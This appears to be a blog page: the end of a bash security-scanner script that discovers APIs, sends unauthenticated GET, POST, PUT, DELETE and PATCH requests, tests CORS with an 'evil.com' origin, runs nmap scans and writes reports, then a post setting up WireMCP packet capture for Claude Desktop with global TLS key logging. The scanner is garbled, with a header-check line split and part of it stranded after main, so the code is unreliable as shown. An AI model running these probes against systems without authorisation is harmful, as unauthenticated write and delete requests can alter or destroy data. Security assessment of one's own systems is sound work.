    OLD_SOFTWARE_COUNT=$(find old_software -type f ! -empty | wc -l)
    echo "$OLD_SOFTWARE_COUNT" > old_software_count.txt
    
    if [ "$OLD_SOFTWARE_COUNT" -gt 0 ]; then
        log_warning "Found $OLD_SOFTWARE_COUNT outdated software components"
        log_debug "Outdated software details saved in old_software/ directory"
    else
        log_success "No obviously outdated software detected"
    fi
}

################################################################################
# API Discovery
################################################################################
api_discovery() {
    if [ "$API_SCAN" = false ]; then
        log_info "API scanning disabled"
        log_debug "Skipping API discovery"
        return
    fi
    
    log_info "Discovering APIs..."
    log_debug "Creating api_discovery directory"
    
    mkdir -p api_discovery
    
    # Common API paths
    API_PATHS=(
        "/api"
        "/api/v1"
        "/api/v2"
        "/rest"
        "/graphql"
        "/swagger"
        "/swagger.json"
        "/api-docs"
        "/openapi.json"
        "/.well-known/openapi"
    )
    
    log_debug "Testing ${#API_PATHS[@]} common API endpoints"
    for path in "${API_PATHS[@]}"; do
        log_debug "Testing: $path"
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${path}")
        if [ "$HTTP_CODE" != "404" ]; then
            echo "$path: HTTP $HTTP_CODE" >> api_discovery/endpoints_found.txt
            log_debug "Found API endpoint: $path (HTTP $HTTP_CODE)"
            curl -s "https://${DOMAIN}${path}" > "api_discovery/${path//\//_}.txt" 2>/dev/null || true
        fi
    done
    
    # Check for API documentation
    log_info "Checking for API documentation..."
    log_debug "Testing for Swagger UI and API docs"
    curl -s "https://${DOMAIN}/swagger-ui" > api_discovery/swagger_ui.txt 2>/dev/null || true
    curl -s "https://${DOMAIN}/api/docs" > api_discovery/api_docs.txt 2>/dev/null || true
    
    log_success "API discovery complete"
}

################################################################################
# API Permission Testing
################################################################################
api_permission_testing() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping permission testing"
        return
    fi
    
    log_info "Testing API permissions..."
    log_debug "Creating api_permissions directory"
    
    mkdir -p api_permissions
    
    # Test common API endpoints without authentication
    if [ -f api_discovery/endpoints_found.txt ]; then
        log_debug "Testing discovered API endpoints for authentication issues"
        while IFS= read -r endpoint; do
            API_PATH=$(echo "$endpoint" | cut -d: -f1)
            
            # Test GET without auth
            log_info "Testing $API_PATH without authentication..."
            log_debug "Sending unauthenticated GET request to $API_PATH"
            HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${API_PATH}")
            echo "$API_PATH: $HTTP_CODE" >> api_permissions/unauth_access.txt
            log_debug "Response: HTTP $HTTP_CODE"
            
            # Test common HTTP methods
            log_debug "Testing HTTP methods on $API_PATH"
            for method in GET POST PUT DELETE PATCH; do
                HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "https://${DOMAIN}${API_PATH}")
                if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then
                    log_warning "$API_PATH allows $method without authentication (HTTP $HTTP_CODE)"
                    echo "$API_PATH: $method - HTTP $HTTP_CODE" >> api_permissions/method_issues.txt
                fi
            done
        done < api_discovery/endpoints_found.txt
    fi
    
    # Check for CORS misconfigurations
    log_info "Checking CORS configuration..."
    log_debug "Testing CORS headers with evil.com origin"
    curl -s -H "Origin: https://evil.com" -I "https://${DOMAIN}/api" | grep -i "access-control" > api_permissions/cors_headers.txt || true
    
    log_success "API permission testing complete"
}

################################################################################
# HTTP Security Headers
################################################################################
http_security_headers() {
    log_info "Analyzing HTTP security headers..."
    log_debug "Fetching headers from https://${DOMAIN}"
    
    # Get headers from main domain
    curl -I "https://${DOMAIN}" 2>/dev/null > http_headers.txt
    
    # Check for specific security headers
    declare -A HEADERS=(
        ["x-frame-options"]="X-Frame-Options"
        ["x-content-type-options"]="X-Content-Type-Options"
        ["strict-transport-security"]="Strict-Transport-Security"
        ["content-security-policy"]="Content-Security-Policy"
        ["referrer-policy"]="Referrer-Policy"
        ["permissions-policy"]="Permissions-Policy"
        ["x-xss-protection"]="X-XSS-Protection"
    )
    
    log_debug "Checking for security headers"
    > security_headers_status.txt
    for header in "${!HEADERS[@]}"; do
        if grep -qi "^${header}:" http_headers.txt; then
 security_headers_status.txt
        else
            echo "${HEADERS[$header]}: Missing" >> security_headers_status.txt
        fi
    done
    
    log_success "HTTP security headers analysis complete"
}

################################################################################
# Subdomain Scanning
################################################################################
scan_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ] || [ ! -f subdomains_discovered.txt ]; then
        log_debug "Subdomain scanning disabled or no subdomains discovered"
        return
    fi
    
    log_info "Scanning discovered subdomains..."
    log_debug "Creating subdomain_scans directory"
    
    mkdir -p subdomain_scans
    
    local count=0
    while IFS= read -r subdomain; do
        count=$((count + 1))
        log_info "Scanning subdomain $count/$SUBDOMAIN_COUNT: $subdomain"
        log_debug "Testing accessibility of $subdomain"
        
        # Quick check if subdomain is accessible
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${subdomain}" --max-time 5)
        
        if echo "$HTTP_CODE" | grep -q "^[2-4]"; then
            log_debug "$subdomain is accessible (HTTP $HTTP_CODE)"
            
            # Get headers
            log_debug "Fetching headers from $subdomain"
            curl -I "https://${subdomain}" 2>/dev/null > "subdomain_scans/${subdomain}_headers.txt"
            
            # Quick port check (top 100 ports)
            log_debug "Scanning top 100 ports on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap --top-ports 100 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            else
                nmap --top-ports 100 "$subdomain" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            fi
            
            # Check for old software
            log_debug "Checking service versions on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap -sV --top-ports 10 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            else
                nmap -sV --top-ports 10 "$subdomain" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            fi
            
            log_success "Scanned: $subdomain (HTTP $HTTP_CODE)"
        else
            log_warning "Subdomain not accessible: $subdomain (HTTP $HTTP_CODE)"
        fi
    done < subdomains_discovered.txt
    
    log_success "Subdomain scanning complete"
}

################################################################################
# Generate Executive Summary
################################################################################
generate_executive_summary() {
    log_info "Generating executive summary..."
    log_debug "Creating executive summary report"
    
    cat > "$EXEC_REPORT" << EOF
# Executive Summary
## Enhanced Security Assessment Report

**Target Domain:** $DOMAIN  
**Target IP:** $IP_ADDRESS  
**Scan Date:** $SCAN_DATE  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE

---

## Overview

This report summarizes the comprehensive security assessment findings for $DOMAIN. The assessment included passive reconnaissance, vulnerability scanning, asset discovery, and API security testing.

---

## Key Findings

### 1. Domain Information

- **Primary Domain:** $DOMAIN
- **IP Address:** $IP_ADDRESS
- **Subdomains Discovered:** $(cat subdomain_count.txt)

### 2. SSL/TLS Configuration

**Certificate Information:**
\`\`\`
Issuer: $(cat cert_issuer.txt)
Subject: $(cat cert_subject.txt)
$(cat cert_dates.txt)
\`\`\`

**TLS Protocol Support:**
\`\`\`
$(cat tls_versions.txt)
\`\`\`

**Assessment:**
EOF

    # Add TLS assessment
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "⚠️ **Warning:** Outdated TLS protocols detected (TLSv1.0/1.1)" >> "$EXEC_REPORT"
    else
        echo "✅ **Good:** Only modern TLS protocols detected (TLSv1.2/1.3)" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 3. Port Exposure

- **Open Ports (Top 1000):** $(cat open_ports_count.txt)

**Open Ports List:**
\`\`\`
$(cat open_ports_list.txt)
\`\`\`

### 4. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ] && [ -f vulnerability_count.txt ]; then
        cat >> "$EXEC_REPORT" << EOF
- **Vulnerabilities Found:** $(cat vulnerability_count.txt)

**Critical Vulnerabilities:**
\`\`\`
$(head -20 vulnerabilities_found.txt)
\`\`\`

EOF
    else
        echo "Vulnerability scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 5. Outdated Software

- **Outdated Components Found:** $(cat old_software_count.txt)

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        echo "**Outdated Software Detected:**" >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
        find old_software -type f ! -empty -exec basename {} \; >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 6. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        if [ -f api_discovery/endpoints_found.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Endpoints Discovered:**
\`\`\`
$(cat api_discovery/endpoints_found.txt)
\`\`\`

EOF
        fi
        
        if [ -f api_permissions/method_issues.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Permission Issues:**
\`\`\`
$(cat api_permissions/method_issues.txt)
\`\`\`

EOF
        fi
    else
        echo "API scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 7. HTTP Security Headers

\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## Priority Recommendations

### Immediate Actions (Priority 1)

EOF

    # Add specific recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. **Disable TLSv1.0/1.1:** Update TLS configuration immediately" >> "$EXEC_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. **Patch Vulnerabilities:** Address $(cat vulnerability_count.txt) identified vulnerabilities" >> "$EXEC_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. **Update Software:** Upgrade $(cat old_software_count.txt) outdated components" >> "$EXEC_REPORT"
    fi
    
    if grep -q "Missing" security_headers_status.txt; then
        echo "4. **Implement Security Headers:** Add missing HTTP security headers" >> "$EXEC_REPORT"
    fi
    
    if [ -f api_permissions/method_issues.txt ]; then
        echo "5. **Fix API Permissions:** Implement proper authentication on exposed APIs" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### Review Actions (Priority 2)

1. Review all open ports and close unnecessary services
2. Audit subdomain inventory and decommission unused subdomains
3. Implement API authentication and authorization
4. Regular vulnerability scanning schedule
5. Software update policy and procedures

---

## Next Steps

1. Review detailed technical and vulnerability reports
2. Prioritize remediation based on risk assessment
3. Implement security improvements
4. Schedule follow-up assessment after remediation

---

**Report Generated:** $(date)  
**Scan Directory:** $SCAN_DIR

**Additional Reports:**
- Technical Report: technical_report.md
- Vulnerability Report: vulnerability_report.md
- API Security Report: api_security_report.md

EOF

    log_success "Executive summary generated: $EXEC_REPORT"
    log_debug "Executive summary saved to: $SCAN_DIR/$EXEC_REPORT"
}

################################################################################
# Generate Technical Report
################################################################################
generate_technical_report() {
    log_info "Generating detailed technical report..."
    log_debug "Creating technical report"
    
    cat > "$TECH_REPORT" << EOF
# Technical Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE  
**Classification:** CONFIDENTIAL

---

## 1. Scope

**Primary Target:** $DOMAIN  
**IP Address:** $IP_ADDRESS  
**Subdomain Scanning:** $([ "$SCAN_SUBDOMAINS" = true ] && echo "Enabled" || echo "Disabled")  
**Vulnerability Scanning:** $([ "$VULN_SCAN" = true ] && echo "Enabled" || echo "Disabled")  
**API Testing:** $([ "$API_SCAN" = true ] && echo "Enabled" || echo "Disabled")

---

## 2. DNS Configuration

\`\`\`
$(cat dns_records.txt)
\`\`\`

---

## 3. SSL/TLS Configuration

\`\`\`
$(cat certificate_details.txt)
\`\`\`

---

## 4. Port Scan Results

\`\`\`
$(cat port_scan_top1000.txt)
\`\`\`

---

## 5. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 5.1 NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

### 5.2 HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

### 5.3 SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 6. Asset Discovery

### 6.1 Web Technologies

\`\`\`
$(cat assets/web_technologies.txt)
\`\`\`

### 6.2 CMS Detection

\`\`\`
$(cat assets/cms_detection.txt)
\`\`\`

### 6.3 JavaScript Libraries

\`\`\`
$(cat assets/js_libraries.txt)
\`\`\`

### 6.4 Common Files

\`\`\`
$(cat assets/common_files.txt 2>/dev/null || echo "No common files found")
\`\`\`

---

## 7. Outdated Software

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        for file in old_software/*.txt; do
            if [ -f "$file" ] && [ -s "$file" ]; then
                echo "### $(basename "$file" .txt)" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                cat "$file" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                echo >> "$TECH_REPORT"
            fi
        done
    else
        echo "No outdated software detected." >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 8. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 8.1 API Endpoints

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

### 8.2 API Permissions

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No permission issues found")
\`\`\`

### 8.3 CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS headers found")
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 9. HTTP Security Headers

\`\`\`
$(cat http_headers.txt)
\`\`\`

**Security Headers Status:**
\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## 10. Recommendations

### 10.1 Immediate Actions

EOF

    # Add recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. Disable TLSv1.0 and TLSv1.1 protocols" >> "$TECH_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. Patch identified vulnerabilities" >> "$TECH_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. Update outdated software components" >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

### 10.2 Review Actions

1. Review all open ports and services
2. Audit subdomain inventory
3. Implement missing security headers
4. Review API authentication
5. Regular security assessments

---

## 11. Document Control

**Classification:** CONFIDENTIAL  
**Distribution:** Security Team, Infrastructure Team  
**Prepared By:** Enhanced Security Scanner v$VERSION  
**Date:** $(date)

---

**END OF TECHNICAL REPORT**
EOF

    log_success "Technical report generated: $TECH_REPORT"
    log_debug "Technical report saved to: $SCAN_DIR/$TECH_REPORT"
}

################################################################################
# Generate Vulnerability Report
################################################################################
generate_vulnerability_report() {
    if [ "$VULN_SCAN" = false ]; then
        log_debug "Vulnerability scanning disabled, skipping vulnerability report"
        return
    fi
    
    log_info "Generating vulnerability report..."
    log_debug "Creating vulnerability report"
    
    cat > "$VULN_REPORT" << EOF
# Vulnerability Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION

---

## Executive Summary

**Total Vulnerabilities Found:** $(cat vulnerability_count.txt)

---

## 1. NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

---

## 2. HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

---

## 3. SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

---

## 4. Detailed Findings

\`\`\`
$(cat vulnerabilities_found.txt)
\`\`\`

---

**END OF VULNERABILITY REPORT**
EOF

    log_success "Vulnerability report generated: $VULN_REPORT"
    log_debug "Vulnerability report saved to: $SCAN_DIR/$VULN_REPORT"
}

################################################################################
# Generate API Security Report
################################################################################
generate_api_report() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping API report"
        return
    fi
    
    log_info "Generating API security report..."
    log_debug "Creating API security report"
    
    cat > "$API_REPORT" << EOF
# API Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Scanner Version:** $VERSION

---

## 1. API Discovery

### 1.1 Endpoints Found

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

---

## 2. Permission Testing

### 2.1 Unauthenticated Access

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No unauthenticated access issues")
\`\`\`

### 2.2 HTTP Method Issues

\`\`\`
$(cat api_permissions/method_issues.txt 2>/dev/null || echo "No method issues found")
\`\`\`

---

## 3. CORS Configuration

\`\`\`
$(cat api_permissions/cors_headers.txt 2>/dev/null || echo "No CORS issues found")
\`\`\`

---

**END OF API SECURITY REPORT**
EOF

    log_success "API security report generated: $API_REPORT"
    log_debug "API security report saved to: $SCAN_DIR/$API_REPORT"
}

################################################################################
# Main Execution
################################################################################
main() {
    echo "========================================"
    echo "Enhanced Security Scanner v${VERSION}"
    echo "========================================"
    echo
    log_debug "Script started at $(date)"
    log_debug "Network interface: $NETWORK_INTERFACE"
    log_debug "Debug mode: $DEBUG"
    echo
    
    # Check dependencies
    check_dependencies
    
    # Initialize scan
    initialize_scan
    
    # Run scans
    log_debug "Starting DNS reconnaissance phase"
    dns_reconnaissance
    
    log_debug "Starting subdomain discovery phase"
    discover_subdomains
    
    log_debug "Starting SSL/TLS analysis phase"
    ssl_tls_analysis
    
    log_debug "Starting port scanning phase"
    port_scanning
    
    if [ "$VULN_SCAN" = true ]; then
        log_debug "Starting vulnerability scanning phase"
        vulnerability_scanning
    fi
    
    log_debug "Starting hping3 testing phase"
    hping3_testing
    
    log_debug "Starting asset discovery phase"
    asset_discovery
    
    log_debug "Starting old software detection phase"
    detect_old_software
    
    if [ "$API_SCAN" = true ]; then
        log_debug "Starting API discovery phase"
        api_discovery
        log_debug "Starting API permission testing phase"
        api_permission_testing
    fi
    
    log_debug "Starting HTTP security headers analysis phase"
    http_security_headers
    
    log_debug "Starting subdomain scanning phase"
    scan_subdomains
    
    # Generate reports
    log_debug "Starting report generation phase"
    generate_executive_summary
    generate_technical_report
    generate_vulnerability_report
    generate_api_report
    
    # Summary
    echo
    echo "========================================"
    log_success "Scan Complete!"
    echo "========================================"
    echo
    log_info "Scan directory: $SCAN_DIR"
    log_info "Executive summary: $SCAN_DIR/$EXEC_REPORT"
    log_info "Technical report: $SCAN_DIR/$TECH_REPORT"
    
    if [ "$VULN_SCAN" = true ]; then
        log_info "Vulnerability report: $SCAN_DIR/$VULN_REPORT"
    fi
    
    if [ "$API_SCAN" = true ]; then
        log_info "API security report: $SCAN_DIR/$API_REPORT"
    fi
    
    echo
    log_info "Review the reports for detailed findings"
    log_debug "Script completed at $(date)"
}

################################################################################
# Parse Command Line Arguments
################################################################################
DOMAIN=""
SCAN_SUBDOMAINS=false
MAX_SUBDOMAINS=10
VULN_SCAN=false
API_SCAN=false

while getopts "d:sm:vah" opt; do
    case $opt in
        d)
            DOMAIN="$OPTARG"
            ;;
        s)
            SCAN_SUBDOMAINS=true
            ;;
        m)
            MAX_SUBDOMAINS="$OPTARG"
            ;;
        v)
            VULN_SCAN=true
            ;;
        a)
            API_SCAN=true
            ;;
        h)
            usage
            ;;
        \?)
            log_error "Invalid option: -$OPTARG"
            usage
            ;;
    esac
done

# Validate required arguments
if [ -z "$DOMAIN" ]; then
    log_error "Domain is required"
    usage
fi

# Run main function
main
            echo "${HEADERS[$header]}: Present" >>

EOF

chmod +x ./security_scanner_enhanced.sh

Macbook: Setup wireshark packet capture MCP for Antropic Claude Desktop

If you’re like me, the idea of doing anything twice will make you break out in a cold shiver. For my Claude desktop, I often need network pcap (packet capture) to unpack something that I am doing. So the script below installs wireshark, and then the wireshark mcp and then configures Claude to use it. Then I got it to work with zscaler (note, I just did a process grep – you could also check utun/port 9000/9400).

I also added example scripts to test its working and so prompts to help you test in Claude.

cat > ~/setup_wiremcp_simple.sh << 'EOF'
#!/bin/bash

# Simplified WireMCP Setup with Zscaler Support

echo ""
echo "============================================"
echo "   WireMCP Setup with Zscaler Support"
echo "============================================"
echo ""

# Detect Zscaler
echo "[INFO] Detecting Zscaler..."
ZSCALER_DETECTED=false
ZSCALER_INTERFACE=""

# Check for Zscaler process
if pgrep -f "Zscaler" >/dev/null 2>&1; then
    ZSCALER_DETECTED=true
    echo "[ZSCALER] ✓ Zscaler process is running"
fi

# Find Zscaler tunnel interface
UTUN_INTERFACES=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_INTERFACES; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        ZSCALER_INTERFACE="$iface"
        ZSCALER_DETECTED=true
        echo "[ZSCALER] ✓ Zscaler tunnel found: $iface (IP: $IP)"
        break
    fi
done

if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "[ZSCALER] ✓ Zscaler environment confirmed"
else
    echo "[INFO] No Zscaler detected - standard network"
fi

echo ""

# Check existing installations
echo "[INFO] Checking installed software..."

if command -v tshark >/dev/null 2>&1; then
    echo "[✓] Wireshark/tshark is installed"
else
    echo "[!] Wireshark not found - install with: brew install --cask wireshark"
fi

if command -v node >/dev/null 2>&1; then
    echo "[✓] Node.js is installed: $(node --version)"
else
    echo "[!] Node.js not found - install with: brew install node"
fi

if [[ -d "$HOME/WireMCP" ]]; then
    echo "[✓] WireMCP is installed at ~/WireMCP"
else
    echo "[!] WireMCP not found"
fi

echo ""

# Configure SSL decryption for Zscaler
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "[INFO] Configuring SSL/TLS decryption..."
    
    SSL_KEYLOG="$HOME/.wireshark-sslkeys.log"
    touch "$SSL_KEYLOG"
    chmod 600 "$SSL_KEYLOG"
    
    if ! grep -q "SSLKEYLOGFILE" ~/.zshrc 2>/dev/null; then
        echo "" >> ~/.zshrc
        echo "# Wireshark SSL/TLS decryption for Zscaler" >> ~/.zshrc
        echo "export SSLKEYLOGFILE=\"$SSL_KEYLOG\"" >> ~/.zshrc
        echo "[✓] Added SSLKEYLOGFILE to ~/.zshrc"
    else
        echo "[✓] SSLKEYLOGFILE already in ~/.zshrc"
    fi
    
    echo "[✓] SSL key log file: $SSL_KEYLOG"
fi

echo ""

# Update WireMCP for Zscaler
if [[ -d "$HOME/WireMCP" ]]; then
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        echo "[INFO] Creating Zscaler-aware wrapper..."
        
        cat > "$HOME/WireMCP/start_zscaler.sh" << 'WRAPPER'
#!/bin/bash
echo "=== WireMCP (Zscaler Mode) ==="

# Set SSL decryption
export SSLKEYLOGFILE="$HOME/.wireshark-sslkeys.log"

# Find Zscaler interface
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        export CAPTURE_INTERFACE="$iface"
        echo "✓ Zscaler tunnel: $iface ($IP)"
        echo "✓ All proxied traffic flows through this interface"
        break
    fi
done

if [[ -z "$CAPTURE_INTERFACE" ]]; then
    export CAPTURE_INTERFACE="en0"
    echo "! Using default interface: en0"
fi

echo ""
echo "Configuration:"
echo "  SSL Key Log: $SSLKEYLOGFILE"
echo "  Capture Interface: $CAPTURE_INTERFACE"
echo ""
echo "To capture: sudo tshark -i $CAPTURE_INTERFACE -c 10"
echo "===============================\n"

cd "$(dirname "$0")"
node index.js
WRAPPER
        
        chmod +x "$HOME/WireMCP/start_zscaler.sh"
        echo "[✓] Created ~/WireMCP/start_zscaler.sh"
    fi
    
    # Create test script
    cat > "$HOME/WireMCP/test_zscaler.sh" << 'TEST'
#!/bin/bash

echo "=== Zscaler & WireMCP Test ==="
echo ""

# Check Zscaler process
if pgrep -f "Zscaler" >/dev/null; then
    echo "✓ Zscaler is running"
else
    echo "✗ Zscaler not running"
fi

# Find tunnel
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        echo "✓ Zscaler tunnel: $iface ($IP)"
        FOUND=true
        break
    fi
done

[[ "$FOUND" != "true" ]] && echo "✗ No Zscaler tunnel found"

echo ""

# Check SSL keylog
if [[ -f "$HOME/.wireshark-sslkeys.log" ]]; then
    SIZE=$(wc -c < "$HOME/.wireshark-sslkeys.log")
    echo "✓ SSL key log exists ($SIZE bytes)"
else
    echo "✗ SSL key log not found"
fi

echo ""
echo "Network interfaces:"
tshark -D 2>/dev/null | head -5

echo ""
echo "To capture Zscaler traffic:"
echo "  sudo tshark -i ${iface:-en0} -c 10"
TEST
    
    chmod +x "$HOME/WireMCP/test_zscaler.sh"
    echo "[✓] Created ~/WireMCP/test_zscaler.sh"
fi

echo ""

# Configure Claude Desktop
CLAUDE_CONFIG="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
if [[ -d "$(dirname "$CLAUDE_CONFIG")" ]]; then
    echo "[INFO] Configuring Claude Desktop..."
    
    # Backup existing
    if [[ -f "$CLAUDE_CONFIG" ]]; then
        BACKUP_FILE="${CLAUDE_CONFIG}.backup.$(date +%Y%m%d_%H%M%S)"
        cp "$CLAUDE_CONFIG" "$BACKUP_FILE"
        echo "[✓] Backup created: $BACKUP_FILE"
    fi
    
    # Check if jq is installed
    if ! command -v jq >/dev/null 2>&1; then
        echo "[INFO] Installing jq for JSON manipulation..."
        brew install jq
    fi
    
    # Create temp capture directory
    TEMP_CAPTURE_DIR="$HOME/.wiremcp/captures"
    mkdir -p "$TEMP_CAPTURE_DIR"
    echo "[✓] Capture directory: $TEMP_CAPTURE_DIR"
    
    # Prepare environment variables
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        ENV_JSON=$(jq -n \
            --arg ssllog "$HOME/.wireshark-sslkeys.log" \
            --arg iface "${ZSCALER_INTERFACE:-en0}" \
            --arg capdir "$TEMP_CAPTURE_DIR" \
            '{"SSLKEYLOGFILE": $ssllog, "CAPTURE_INTERFACE": $iface, "ZSCALER_MODE": "true", "CAPTURE_DIR": $capdir}')
    else
        ENV_JSON=$(jq -n \
            --arg capdir "$TEMP_CAPTURE_DIR" \
            '{"CAPTURE_DIR": $capdir}')
    fi
    
    # Add or update wiremcp in config, preserving existing servers
    if [[ -f "$CLAUDE_CONFIG" ]] && [[ -s "$CLAUDE_CONFIG" ]]; then
        echo "[INFO] Merging WireMCP into existing config..."
        jq --arg home "$HOME" \
           --argjson env "$ENV_JSON" \
           '.mcpServers.wiremcp = {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}' \
           "$CLAUDE_CONFIG" > "${CLAUDE_CONFIG}.tmp" && mv "${CLAUDE_CONFIG}.tmp" "$CLAUDE_CONFIG"
    else
        echo "[INFO] Creating new Claude config..."
        jq -n --arg home "$HOME" \
              --argjson env "$ENV_JSON" \
              '{"mcpServers": {"wiremcp": {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}}}' \
              > "$CLAUDE_CONFIG"
    fi
    
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        echo "[✓] Claude configured with Zscaler mode"
    else
        echo "[✓] Claude configured"
    fi
    echo "[✓] Existing MCP servers preserved"
fi

echo ""
echo "============================================"
echo "             Summary"
echo "============================================"
echo ""

if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "Zscaler Environment:"
    echo "  ✓ Detected and configured"
    [[ -n "$ZSCALER_INTERFACE" ]] && echo "  ✓ Tunnel interface: $ZSCALER_INTERFACE"
    echo "  ✓ SSL decryption ready"
    echo ""
    echo "Next steps:"
    echo "  1. Restart terminal: source ~/.zshrc"
    echo "  2. Restart browsers for HTTPS decryption"
else
    echo "Standard Network:"
    echo "  • No Zscaler detected"
    echo "  • Standard configuration applied"
fi

echo ""
echo "For Claude Desktop:"
echo "  1. Restart Claude Desktop app"
echo "  2. Ask Claude to analyze network traffic"
echo ""
echo "============================================"

exit 0
EOF
chmod +x ~/setup_wiremcp_simple.sh

To test if the script worked:

cat > ~/test_wiremcp_claude.sh << 'EOF'
#!/bin/bash

# WireMCP Claude Desktop Interactive Test Script

echo "╔════════════════════════════════════════════════════════╗"
echo "║     WireMCP + Claude Desktop Testing Tool             ║"
echo "╚════════════════════════════════════════════════════════╝"
echo ""

# Colors
GREEN='\033[0;32m'
BLUE='\033[0;34m'
YELLOW='\033[1;33m'
NC='\033[0m'

# Check prerequisites
echo -e "${BLUE}[1/4]${NC} Checking prerequisites..."

if ! command -v tshark >/dev/null 2>&1; then
    echo "   ✗ tshark not found"
    exit 1
fi

if [[ ! -d "$HOME/WireMCP" ]]; then
    echo "   ✗ WireMCP not found at ~/WireMCP"
    exit 1
fi

